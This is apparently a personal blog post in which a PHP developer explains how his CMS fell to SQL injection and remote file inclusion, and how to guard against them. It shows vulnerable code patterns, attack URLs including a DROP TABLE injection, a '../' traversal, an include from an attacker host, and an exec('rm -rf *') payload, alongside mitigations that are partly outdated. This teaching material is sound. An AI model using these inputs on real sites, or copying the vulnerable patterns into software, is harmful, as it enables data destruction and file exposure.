About a year and a half ago, i started coding my CMS, Jasmine. It was a combination of experience on several CMS’s like the nukes, e107, joomla and jupiter (which i was sad to see close a few months ago). I was (and maybe still am in a way) an inexperienced php coder and i was still trying to find my way around. So, as it was natural, i fell for the most serious errors in coding, sql injection and remote file inclusion. Here, i will try to explain in short what happened and how to avoid it.
SQL Injection:
Here is a real life scenario. You want to get the contents of a page according to the get variable. Let’s say you want to retreive the news item on the get URI like this: yoursite.com/news.php?item=2
So, you will make a query like this:
mysql_query('SELECT body FROM news_items WHERE id='.$_GET['item']);
If, by seeing this, you think “so where is the catch”, when finished reading this go back to your code and check it all up 🙂 The above query seems very fine but it can be exploited from anybody. Let’s say the link is not like the one above but like this: “yoursite.com/news.php?item=-1;DROP%20TABLE%20news_items;”. Now this is a problem. Because, the string that will be passed to the mysql_query will actualy be the concatenation of the query string we already havein our code plus the string that is in the GET.
This is not a situation that is unavoidable. You need to do what is called “sanitising”, meaning that you have to make sure that the variable in the GET is what you expect it to be. Here, you expect it to be a number so the following should happen:
mysql_query('SELECT body FROM news_items WHERE id='.intval($_GET['item']));
By passing the argument to the function intval you actualy make sure it is an integer number. There is also floatval if you expect the parameter to be a float. So far so good. But what if what we expect is a string, let’s say a search string. Here is the way we should deal with that situation:
mysql_query('SELECT title FROM news_items WHERE title LIKE "%'.mysql_real_escape_string($_GET['search']).'%";')
The function mysql_real_escape_string actually places “\” before each stop character such as “, ‘, ; etc etc. This way you are sure that even if something malicious is added in your GET it will surely be ignored and will not be executed as a query.
Remote File Inclusion:
This is another dangerous scenario that can cause alot of trouble. Let’s say you are developing a simple php file explorer, which gets the path from the URI, opens it and lists the files it contains. So, the URI would be something like “yoursite.com/explorer.php?path=photos/”. In your code you would to something like:
$dir = opendir('/some/path/'.$_GET['path']);
while($file = readdir($dir)){
echo $file;
}
With this function you will actually get all the contents of the folder “/some/path/photos/”. But here is a dangerous situation too. Let’s say the URI is not like the one above but like this “yoursite.com/explorer.php?path=../”. This way you will get the contents of the folder “/some/path/../” which actualy is “/some/”. Busted. An attacker can actually browse all the folders that the user running the apache has read access. Even worse, if the script is more complicated, let’s say that it will echo the contents of the file given as a parameter, things are even worse. This way the whole world can read all the files of the server running the script. To be able to solve this you need to make a good and thourough check on your variable.
But, the meaning of the term “Remote file inclusion” is even worse than all the above. Let’s say you have a modular script that loads a file given from the URI. Suppose you have the following “yoursite.com/include.php?file=foo.php”. In your modular script you would have something like:
include($_GET['file']);
Ouch! Houston, you have a problem :). An attacker could do the following “yoursite.com/include.php?file=http://attackersite.com/exploitscript.txt”. In there, he could add php commands like:
exec('rm -rf *');
To avoid all the above you need to check you variables ver very carefuly. Use functions like realpath to determine the path to be included and compare it to what you expect.
One thing i want to point out. Throughout the article i used the getters. This does not mean that POST is safe. As you know, POST is a very big get that can also be facked. Techniques using the HTTP protocol can do that. For more details read the article i wrote “HTTP for hardcores or… masochists!“.
If you have any pointers i’d love to hear about them so, leave a comment 😉